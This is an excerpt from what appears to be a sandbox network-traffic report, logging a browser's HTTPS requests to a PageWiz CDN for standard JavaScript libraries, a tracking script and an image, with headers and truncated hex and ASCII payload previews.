                                                                2025-04-09 00:18:34 UTC15908INData Raw: 2f 2a 21 0a 20 2a 20 66 61 6e 63 79 42 6f 78 20 2d 20 6a 51 75 65 72 79 20 50 6c 75 67 69 6e 0a 20 2a 20 76 65 72 73 69 6f 6e 3a 20 32 2e 31 2e 35 20 28 46 72 69 2c 20 31 34 20 4a 75 6e 20 32 30 31 33 29 0a 20 2a 20 40 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 20 76 31 2e 36 20 6f 72 20 6c 61 74 65 72 0a 20 2a 0a 20 2a 20 45 78 61 6d 70 6c 65 73 20 61 74 20 68 74 74 70 3a 2f 2f 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 2f 66 61 6e 63 79 62 6f 78 2f 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 77 77 77 2e 66 61 6e 63 79 61 70 70 73 2e 63 6f 6d 2f 66 61 6e 63 79 62 6f 78 2f 23 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 32 20 4a 61 6e 69 73 20 53 6b 61 72 6e 65 6c 69 73 20 2d 20 6a 61 6e 69 73 40 66 61 6e 63 79 61 70 70 73 2e
                                                                Data Ascii: /*! * fancyBox - jQuery Plugin * version: 2.1.5 (Fri, 14 Jun 2013) * @requires jQuery v1.6 or later * * Examples at http://fancyapps.com/fancybox/ * License: www.fancyapps.com/fancybox/#license * * Copyright 2012 Janis Skarnelis - janis@fancyapps.
                                                                2025-04-09 00:18:34 UTC8361INData Raw: 28 29 3b 57 3d 28 56 3e 58 7c 7c 75 3e 72 29 26 26 4d 3e 46 26 26 4a 3e 79 3b 59 3d 4c 2e 61 73 70 65 63 74 52 61 74 69 6f 3f 28 4d 3c 4e 26 26 4a 3c 41 26 26 4d 3c 48 26 26 4a 3c 47 29 3a 28 28 4d 3c 4e 7c 7c 4a 3c 41 29 26 26 28 4d 3c 48 7c 7c 4a 3c 47 29 29 3b 69 2e 65 78 74 65 6e 64 28 4c 2c 7b 64 69 6d 3a 7b 77 69 64 74 68 3a 67 28 56 29 2c 68 65 69 67 68 74 3a 67 28 75 29 7d 2c 6f 72 69 67 57 69 64 74 68 3a 48 2c 6f 72 69 67 48 65 69 67 68 74 3a 47 2c 63 61 6e 53 68 72 69 6e 6b 3a 57 2c 63 61 6e 45 78 70 61 6e 64 3a 59 2c 77 50 61 64 64 69 6e 67 3a 74 2c 68 50 61 64 64 69 6e 67 3a 73 2c 77 72 61 70 53 70 61 63 65 3a 75 2d 4f 2e 6f 75 74 65 72 48 65 69 67 68 74 28 74 72 75 65 29 2c 73 6b 69 6e 53 70 61 63 65 3a 4f 2e 68 65 69 67 68 74 28 29 2d 4a 7d
                                                                Data Ascii: ();W=(V>X||u>r)&&M>F&&J>y;Y=L.aspectRatio?(M<N&&J<A&&M<H&&J<G):((M<N||J<A)&&(M<H||J<G));i.extend(L,{dim:{width:g(V),height:g(u)},origWidth:H,origHeight:G,canShrink:W,canExpand:Y,wPadding:t,hPadding:s,wrapSpace:u-O.outerHeight(true),skinSpace:O.height()-J}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.54971479.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC601OUTGET /LPStaticResources/jquery.tip.js?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC475INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: application/javascript
                                                                Content-Length: 4348
                                                                Connection: close
                                                                Last-Modified: Mon, 09 Sep 2019 08:21:19 GMT
                                                                ETag: "2bde968ee766d51:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAGckjviAZd3gA0A
                                                                X-77-NZT-Ray: f03d0613f45b51c1dabcf567ef1def20
                                                                X-77-Cache: HIT
                                                                X-77-Age: 884855
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC4348INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 68 29 7b 68 2e 66 6e 2e 74 69 70 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3d 68 2e 65 78 74 65 6e 64 28 7b 7d 2c 68 2e 66 6e 2e 74 69 70 2e 64 65 66 61 75 6c 74 73 2c 62 29 3b 69 66 28 61 2e 6f 6e 48 6f 76 65 72 29 7b 69 66 28 61 2e 73 74 69 63 6b 49 66 43 75 72 72 65 6e 74 29 7b 74 68 69 73 2e 66 69 6c 74 65 72 28 22 2e 22 2b 61 2e 63 75 72 72 65 6e 74 43 6c 61 73 73 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 68 28 74 68 69 73 29 2e 63 72 65 61 74 65 54 69 70 28 61 29 7d 29 7d 69 66 28 61 2e 72 65 76 65 72 73 65 48 6f 76 65 72 29 7b 68 28 74 68 69 73 29 2e 63 72 65 61 74 65 54 69 70 28 61 29 3b 74 68 69 73 2e 68 6f 76 65 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 2e 73 74 69 63 6b 49 66
                                                                Data Ascii: (function(h){h.fn.tip=function(b){var a=h.extend({},h.fn.tip.defaults,b);if(a.onHover){if(a.stickIfCurrent){this.filter("."+a.currentClass).each(function(c){h(this).createTip(a)})}if(a.reverseHover){h(this).createTip(a);this.hover(function(){if(!a.stickIf


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.54971579.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC600OUTGET /LPStaticResources/swfobject.js?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC475INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: application/javascript
                                                                Content-Length: 6299
                                                                Connection: close
                                                                Last-Modified: Mon, 09 Sep 2019 08:21:19 GMT
                                                                ETag: "1ede9f8ee766d51:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAGckjvfAZezjwMA
                                                                X-77-NZT-Ray: f03d0613f866bdc2dabcf5674ffaac22
                                                                X-77-Cache: HIT
                                                                X-77-Age: 233395
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC6299INData Raw: 69 66 28 74 79 70 65 6f 66 20 64 65 63 6f 6e 63 65 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 76 61 72 20 64 65 63 6f 6e 63 65 70 74 3d 6e 65 77 20 4f 62 6a 65 63 74 28 29 7d 69 66 28 74 79 70 65 6f 66 20 64 65 63 6f 6e 63 65 70 74 2e 75 74 69 6c 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 64 65 63 6f 6e 63 65 70 74 2e 75 74 69 6c 3d 6e 65 77 20 4f 62 6a 65 63 74 28 29 7d 69 66 28 74 79 70 65 6f 66 20 64 65 63 6f 6e 63 65 70 74 2e 53 57 46 4f 62 6a 65 63 74 55 74 69 6c 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 64 65 63 6f 6e 63 65 70 74 2e 53 57 46 4f 62 6a 65 63 74 55 74 69 6c 3d 6e 65 77 20 4f 62 6a 65 63 74 28 29 7d 64 65 63 6f 6e 63 65 70 74 2e 53 57 46 4f 62 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 77 2c 63 2c 75 2c 71 2c 70 2c 73
                                                                Data Ascii: if(typeof deconcept=="undefined"){var deconcept=new Object()}if(typeof deconcept.util=="undefined"){deconcept.util=new Object()}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object()}deconcept.SWFObject=function(h,w,c,u,q,p,s


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.54971779.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC606OUTGET /LPStaticResources/jquery.json-2.2.js?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC474INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: application/javascript
                                                                Content-Length: 2232
                                                                Connection: close
                                                                Last-Modified: Mon, 09 Sep 2019 08:21:19 GMT
                                                                ETag: "919958ee766d51:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAG5O98UAbeJAQ4A
                                                                X-77-NZT-Ray: f03d0613fc6880c3dabcf56796432623
                                                                X-77-Cache: HIT
                                                                X-77-Age: 917897
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC2232INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 24 2e 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 74 79 70 65 6f 66 28 4a 53 4f 4e 29 3d 3d 22 6f 62 6a 65 63 74 22 26 26 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6f 29 7d 76 61 72 20 74 79 70 65 3d 74 79 70 65 6f 66 28 6f 29 3b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 29 7b 72 65 74 75 72 6e 22 6e 75 6c 6c 22 7d 69 66 28 74 79 70 65 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 72 65 74 75 72 6e 20 75 6e 64 65 66 69 6e 65 64 7d 69 66 28 74 79 70 65 3d 3d 22 6e 75 6d 62 65 72 22 7c 7c 74 79 70 65 3d 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 72 65 74 75 72 6e 20 6f 2b 22 22 7d 69 66 28 74 79 70 65 3d 3d 22 73 74 72 69 6e 67 22 29 7b 72 65
                                                                Data Ascii: (function($){$.toJSON=function(o){if(typeof(JSON)=="object"&&JSON.stringify){return JSON.stringify(o)}var type=typeof(o);if(o===null){return"null"}if(type=="undefined"){return undefined}if(type=="number"||type=="boolean"){return o+""}if(type=="string"){re


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.54971679.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC604OUTGET /LPStaticResources/bootstrap.min.js?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC476INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: application/javascript
                                                                Content-Length: 10056
                                                                Connection: close
                                                                Last-Modified: Mon, 09 Sep 2019 08:21:19 GMT
                                                                ETag: "37907b8ee766d51:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAGckjvfAZcyGA0A
                                                                X-77-NZT-Ray: f03d0613f86644c3dabcf567f1493523
                                                                X-77-Cache: HIT
                                                                X-77-Age: 858162
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC10056INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 67 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 6f 74 73 74 72 61 70 22 29 2c 68 3d 7b 57 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 3a 22 77 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 4d 6f 7a 54 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 4f 54 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 6d 73 54 72 61 6e 73 69 74 69 6f 6e 3a 22 4d 53 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 74 72 61 6e 73 69
                                                                Data Ascii: !function(a){a(function(){a.support.transition=function(){var b=function(){var g=document.createElement("bootstrap"),h={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd",msTransition:"MSTransitionEnd",transi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.54971879.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC606OUTGET /LPStaticResources/sweet-alert.min.js?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC476INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: application/javascript
                                                                Content-Length: 10421
                                                                Connection: close
                                                                Last-Modified: Mon, 09 Sep 2019 08:21:19 GMT
                                                                ETag: "6bbb9d8ee766d51:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAG5O98UAZfAagsA
                                                                X-77-NZT-Ray: f03d0613cc9e6fc6dabcf56778232526
                                                                X-77-Cache: HIT
                                                                X-77-Age: 748224
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC10421INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 77 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 4d 28 57 29 7b 76 61 72 20 48 3d 6e 28 29 2c 4a 3d 48 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 68 32 22 29 2c 4c 3d 48 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 70 22 29 2c 46 3d 48 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 62 75 74 74 6f 6e 2e 63 61 6e 63 65 6c 22 29 2c 4e 3d 48 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 62 75 74 74 6f 6e 2e 63 6f 6e 66 69 72 6d 22 29 3b 69 66 28 4a 2e 69 6e 6e 65 72 48 54 4d 4c 3d 6b 28 57 2e 74 69 74 6c 65 29 2e 73 70 6c 69 74 28 22 5c 6e 22 29 2e 6a 6f 69 6e 28 22 3c 62 72 3e 22 29 2c 4c 2e 69 6e 6e 65 72 48 54 4d 4c 3d 6b 28 57 2e 74 65 78 74 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 5c 6e 22 29 2e 6a 6f 69 6e 28 22 3c 62 72
                                                                Data Ascii: !function(w,f){function M(W){var H=n(),J=H.querySelector("h2"),L=H.querySelector("p"),F=H.querySelector("button.cancel"),N=H.querySelector("button.confirm");if(J.innerHTML=k(W.title).split("\n").join("<br>"),L.innerHTML=k(W.text||"").split("\n").join("<br


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.54971979.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC596OUTGET /LPStaticResources/stats.js?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:35 UTC475INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: application/javascript
                                                                Content-Length: 7396
                                                                Connection: close
                                                                Last-Modified: Mon, 10 Feb 2020 13:41:45 GMT
                                                                ETag: "bef517d617e0d51:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAG5O98UAZcdKQ4A
                                                                X-77-NZT-Ray: f03d0613247976d6dabcf5679bb63d38
                                                                X-77-Cache: HIT
                                                                X-77-Age: 928029
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:35 UTC7396INData Raw: 76 61 72 20 6d 6f 75 73 65 74 72 61 63 6b 65 72 3b 76 61 72 20 70 77 54 72 61 63 6b 65 72 3b 76 61 72 20 73 74 72 67 75 69 64 3d 22 22 3b 76 61 72 20 5f 75 76 3b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 70 77 54 72 61 63 6b 65 72 3d 6e 65 77 20 70 77 54 72 61 63 6b 28 29 3b 70 77 54 72 61 63 6b 65 72 2e 69 6e 69 74 54 72 61 63 6b 65 72 28 29 3b 73 74 72 67 75 69 64 3d 70 77 54 72 61 63 6b 65 72 2e 67 75 69 64 73 74 72 69 6e 67 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 70 77 54 72 61 63 6b 28 29 7b 74 68 69 73 2e 73 68 6f 77 50 69 78 65 6c 3d 61 3b 74 68 69 73 2e 63 72 65 61 74 65 67 75 69 64 3d 63 3b 74 68 69 73 2e 69 6e 69 74 54 72 61 63 6b 65 72 3d 64 3b 70 77 54 72 61 63 6b 2e 70 72 6f 74 6f 74 79
                                                                Data Ascii: var mousetracker;var pwTracker;var strguid="";var _uv;jQuery(document).ready(function(){pwTracker=new pwTrack();pwTracker.initTracker();strguid=pwTracker.guidstring});function pwTrack(){this.showPixel=a;this.createguid=c;this.initTracker=d;pwTrack.prototy


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.54972079.127.206.2354436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC598OUTGET /LPStaticResources/FontFix.js?v=18.01.24 HTTP/1.1
                                                                Host: static.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:35 UTC474INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: application/javascript
                                                                Content-Length: 2682
                                                                Connection: close
                                                                Last-Modified: Sun, 09 Feb 2020 13:00:36 GMT
                                                                ETag: "ffee9eb48dfd51:0"
                                                                X-Powered-By: ASP.NET
                                                                Access-Control-Allow-Origin: *
                                                                X-77-NZT: EggBT3/O6QFBDAFZu7EMAbeo5AYA
                                                                X-77-NZT-Ray: f03d061375a68bd7dabcf5678ce97f39
                                                                X-77-Cache: HIT
                                                                X-77-Age: 451752
                                                                Vary: Accept-Encoding
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:35 UTC2682INData Raw: 24 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 46 69 78 46 6f 6e 74 42 6f 6f 73 74 69 6e 67 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 46 69 78 46 6f 6e 74 42 6f 6f 73 74 69 6e 67 28 29 7b 76 61 72 20 6d 3d 22 22 3b 76 61 72 20 64 3d 74 72 75 65 3b 76 61 72 20 66 3d 69 28 29 3b 76 61 72 20 68 3d 6e 28 29 3b 76 61 72 20 71 3d 31 3b 76 61 72 20 70 3d 30 2e 39 39 3b 6f 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 69 66 28 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 22 42 6c 6f 63 6b 46 6f 6e 74 42 6f 6f 73 74 69 6e 67 22 29 3e 30 29 7b 72 65 74 75 72 6e 7d 69 66 28 21 61 28 29 29 7b 72 65 74 75 72 6e 7d 65 28 29 3b 24 28 22 2e 64 72 61 67 67 61 62 6c 65 2e 54 65 78 74 22 29 2e 65 61 63 68 28 66 75 6e 63
                                                                Data Ascii: $(window).load(function(){FixFontBoosting()});function FixFontBoosting(){var m="";var d=true;var f=i();var h=n();var q=1;var p=0.99;o();function o(){if(location.href.indexOf("BlockFontBoosting")>0){return}if(!a()){return}e();$(".draggable.Text").each(func


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.54972179.127.206.2344436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:34 UTC449OUTGET /Media/2025-04-08-18-41-23-280meltrdtlzycycrwsmkhokxzmr_UserMedia.png HTTP/1.1
                                                                Host: m1.pagewizcdn.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:35 UTC413INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 100011
                                                                Connection: close
                                                                Last-Modified: Tue, 08 Apr 2025 18:41:23 GMT
                                                                ETag: "b915d0d3b5a8db1:0"
                                                                X-Powered-By: ASP.NET
                                                                X-77-NZT: EgwBT3/O6QH37yEAAAwBuTvfFAG3XioAAA
                                                                X-77-NZT-Ray: f03d0613145877d8dabcf56739f7c13a
                                                                X-77-Cache: HIT
                                                                X-77-Age: 8687
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:35 UTC15971INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 12 00 00 00 9a 08 06 00 00 00 3d cf 7e e3 00 00 0c 3e 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 d0 42 97 12 7a 13 44 a4 04 90 12 42 0b bd 37 1b 21 09 10 4a 8c 81 a0 62 2f 8b 0a ae 5d 54 c0 86 ae 8a 28 58 01 b1 a0 88 9d 45 b1 f7 c5 82 8a b2 2e 16 ec ca 9b 14 d0 75 5f f9 de f9 be b9 f7 bf ff 9c f9 cf 99 73 e7 96 01 40 fd 38 57 2c ce 43 35 00 c8 17 15 4a e2 42 02 18 29 a9 69 0c 52 0f 40 80 0e 20 02 2a 70 e7 f2 0a c4 ac 98 98 08 00 6d f0 fc 77 7b 77 1d 7a 43 bb e2 28 d3 fa 67 ff 7f 35 4d be a0 80 07 00 12 03 71 06 bf 80 97 0f f1 01 00 f0 2a 9e 58 52 08 00 51 c6 5b 4c 2e 14 cb 30 6c 40 5b 02 13 84 78 a1 0c 67 29 70 95 0c 67 28 f0 1e b9 4f 42 1c 1b e2 36
                                                                Data Ascii: PNGIHDR=~>iCCPICC ProfileHWXS[BzDB7!Jb/]T(XE.u_s@8W,C5JB)iR@ *pmw{wzC(g5Mq*XRQ[L.0l@[xg)pg(OB6
